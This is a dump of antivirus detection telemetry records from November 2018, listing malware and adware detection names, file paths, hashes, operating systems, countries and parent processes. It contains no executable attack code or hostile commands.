  Row(detection=Row(filename='ioca786fe64-72c4-d143-8723-029cd932dae0.exe', filepath='C:\\programdata\\kaspersky lab\\avp18.0.0\\temp\\iocA786FE64-72C4-D143-8723-029CD932DAE0.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T12:52:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T18:06:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='402ebb225e0a28f48f6f6675164bc91194292e1a97b5a6e9d43ddc3831b8bd4b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:10:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T21:27:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000af920', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000af920', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:51:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002452-47eb2f23', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-002012-29AB3F0F\\AVSCAN-20181102-002452-47EB2F23', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:24:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e08d639d2bd3fb736f0ef8f337ccffb26f749bd55d282f91d8493b2ad80ad160', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\E08D639D2BD3FB736F0EF8F337CCFFB26F749BD55D282F91D8493B2AD80AD160', filesize=1728000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='e08d639d2bd3fb736f0ef8f337ccffb26f749bd55d282f91d8493b2ad80ad160', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:27:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='im.lock.professional.2010-patch.exe', filepath='C:\\Program Files (x86)\\IM_Lock\\im.lock.professional.2010-patch.exe', filesize=384000, name='TR/Dldr.JMVV.26.#M1.#R1'), hash='d424e74551b90148738ae7e3c810f907a3eb089e5a9d5a22da998d20084a62fc', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:42:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='32d6.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\32D6.tmp', filesize=896000, name='TR/Crypt.XPACK.Gen4.#M300.#R300219'), hash='f1fdf5a690618f86263b03a073592cd58c12fbca0354d113ecb97bdfe419cc72', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:35:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kuhxreaa.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\kUhXReAA.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='codectweaktool.exe', filepath='C:\\Program Files (x86)\\K-Lite Codec Pack\\Tools\\CodecTweakTool.exe', filesize=1216000, name='W32/Jeefo.A.#M1.#R1'), hash='89293a60fbe5bcc3f18435e7491129b0dd79b3595afe9ea1c284f36a4305194f', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Lsj5Z1BTu0u5hzcw.1', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T17:33:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194243-2f47eb99', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194243-2F47EB99', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:42:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='serena def.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\SERENA def.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:08:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150140-9f95f813', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150140-9F95F813', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:01:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='evcreate.exe', filepath='H:\\WINDOWS\\$NtServicePackUninstall$\\evcreate.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='d7fe5d6af46ec9e394d579644d2ed7a7aece57d2bdb6c626d2ac70f09a082107', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-01T10:25:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150253-ad9caccd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150253-AD9CACCD', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:03:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d8a145ffb2b49fbd12f994726772bee6543d5cd51195e2abc12c3f6e8c71c1db', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\D8A145FFB2B49FBD12F994726772BEE6543D5CD51195E2ABC12C3F6E8C71C1DB', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d8a145ffb2b49fbd12f994726772bee6543d5cd51195e2abc12c3f6e8c71c1db', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:11:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='nunes.exe', filepath='C:\\Program Files (x86)\\phenomenally\\nunes.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='f070018df41ad8550324b8d082ab0ffc59b51bf8f9f477b635ad4cf4d01b6312', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-01T14:01:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='remote.exe', filepath='C:\\Users\\X\\Documents\\Steam\\CODEX\\626610\\remote\\remote.exe', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe12_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe12 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T03:00:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094917-36236e5a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094917-36236E5A', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:49:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212641-06e72506', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212641-06E72506', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:27:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='assistente alla poltrona.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\SOCIO SANITARI\\ASSISTENTE ALLA POLTRONA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:13:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='3227.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\3227.tmp', filesize=896000, name='TR/Crypt.XPACK.Gen4.#M300.#R300219'), hash='f1fdf5a690618f86263b03a073592cd58c12fbca0354d113ecb97bdfe419cc72', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:35:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150006-82277b66', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8732e122\\AVSCAN-20181101-124327-EDF9E5E7\\AVSCAN-20181101-150006-82277B66', filesize=960000, name='Adware/Elex.8edb20.#M1.#R1'), hash='8edb20b4c3a60d66ee14e570a6c1656eeec650f1468d432a8baff292709ab787', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:03:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='testauth.exe', filepath='E:\\UltraVNC\\testauth.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='8aba7af9312e1f278c946235fbfdb89749da657c06b28cf97ed34ffca33f2081', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4502352, timestamp='2018-11-01T14:43:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fineprint pro v910 crack license key free download.exe', filepath='C:\\Users\\X\\Downloads\\Compressed\\FinePrint Pro v910 Crack License Key Free Download.exe', filesize=2368000, name='HEUR/AGEN.1006920.#M1.#R1'), hash='afd1f9dbfef929da58b4418c554b0344f7d785cae5c78aba78753eb7ce485dfb', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T20:14:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152122-821c435a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152122-821C435A', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:21:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-171856-2526ee3e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a089a6cb\\AVSCAN-20181101-171840-223B19C1\\AVSCAN-20181101-171856-2526EE3E', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:19:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-205906-5b8d6b93', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2971e285\\AVSCAN-20181104-205836-42A17405\\AVSCAN-20181104-205906-5B8D6B93', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:59:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204053-5677bff4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b406002\\AVSCAN-20181104-203447-1ABE6DE4\\AVSCAN-20181104-204053-5677BFF4', filesize=5600000, name='PUA/MyPCBackup.#M1.#R1'), hash='6faf0ee307903290e31e2097dae91d0439aa112ba2e53a53f9f23ef5798e1a82', metadata=Row(cmdline=None, country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:41:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64_1bc10430.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64_1bc10430.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-045834-d36d48f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83eae172\\AVSCAN-20181104-045802-CCFD0BC3\\AVSCAN-20181104-045834-D36D48F1', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:58:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-162217-ee885303', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b975dbb4\\AVSCAN-20181104-160932-A304E1F8\\AVSCAN-20181104-162217-EE885303', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:22:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='9efcb170c89b7575c13953719263eff6f74be1ffb30c6f047e917ec5793ccfc9', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T18:42:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='panorama.dll', filepath='E:\\Dota2\\bin\\panorama\\panorama.dll', filesize=5044000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='7b10276e5701c1a391e40686cbe8e2dd94256bd6d9bb74387d81e86c825eb970', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:18:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-04T01:12:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='driverreviver.exe', filepath='\\\\10.255.111.86\\d$\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\DriverReviver.exe', filesize=64000, name='BDS/Rogue.766035.#M1.#R1'), hash='a4d3abd76129e10fefa2c2650cfd46e28530b443f76755f23d3f2e7b5c996f07', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T06:22:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='sanborn.vir', filepath='\\\\?\\C:\\Program Files (x86)\\unnerving\\sanborn.VIR', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='35261ecacb50f5062fc40d4528bec81f97f2d53b722b9778438b3ca674a6e7d6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:22:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T08:12:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0001928f', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001928f', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:09:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T06:11:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-144213-db795568', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cd69241a\\AVSCAN-20181104-142503-281E4363\\AVSCAN-20181104-144213-DB795568', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:42:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-160137-a5ee91e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cae01c7d\\AVSCAN-20181104-154448-138A7998\\AVSCAN-20181104-160137-A5EE91E6', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:31:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-17-10-39.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T14:30:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Documents and Settings\\X\\Moje dokumenty\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:51:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-211222-4fc449b5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01ccaa19\\AVSCAN-20181104-211126-445B25F6\\AVSCAN-20181104-211222-4FC449B5', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='FI', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:16:37Z'), dt=datetime.date(2018, 11, 4)),
